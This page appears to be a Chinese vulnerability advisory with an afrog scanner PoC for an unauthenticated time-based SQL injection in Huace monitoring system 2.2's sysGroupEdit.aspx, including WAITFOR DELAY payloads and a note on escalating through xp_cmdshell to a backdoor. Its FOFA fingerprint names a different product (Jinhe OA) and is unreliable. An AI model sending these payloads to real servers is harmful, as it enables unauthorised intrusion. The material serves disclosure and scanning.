huace-sysgoupedit-sqli: 华测监测预警系统2.2 sysGroupEdit.aspx SQL注入漏洞

日期: 2025-09-01 | 影响软件: 华测监测预警系统2.2 | POC: 已公开

漏洞描述

华测监测预警系统2.2 sysGroupEdit.aspx接口存在SQL注入漏洞,未经身份验证的攻击者通过漏洞执行任意SQL语句,调用xpcmdshell写入后门文件,执行任意代码,从而获取到服务器权限。 FOFA: app="金和网络-金和OA"

PoC代码[已公开]

id: huace-sysgoupedit-sqli

info:
  name: 华测监测预警系统2.2 sysGroupEdit.aspx SQL注入漏洞
  author: AVIC123
  severity: high
  verified: true
  description: |-
    华测监测预警系统2.2 sysGroupEdit.aspx接口存在SQL注入漏洞,未经身份验证的攻击者通过漏洞执行任意SQL语句,调用xpcmdshell写入后门文件,执行任意代码,从而获取到服务器权限。
    FOFA: app="金和网络-金和OA"
  reference:
    - https://cn-sec.com/archives/4330220.html
  tags: huace,sqli
  created: 2025/08/06

rules:
  r0:
    request:
      method: GET
      path: /Web/SysManage/sysGroupEdit.aspx?&ID=1';WAITFOR+DELAY+'0:0:5'--
    expression: response.status == 200 && response.latency <= 7000 &&  response.latency >= 5000
  r1:
    request:
      method: GET
      path: /Web/SysManage/sysGroupEdit.aspx?&ID=1';WAITFOR+DELAY+'0:0:10'--
    expression: response.status == 200 && response.latency <= 12000 &&  response.latency >= 10000

expression: r0() && r1()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/vulnerability/huace-sysgoupedit-sqli.yaml

相关漏洞推荐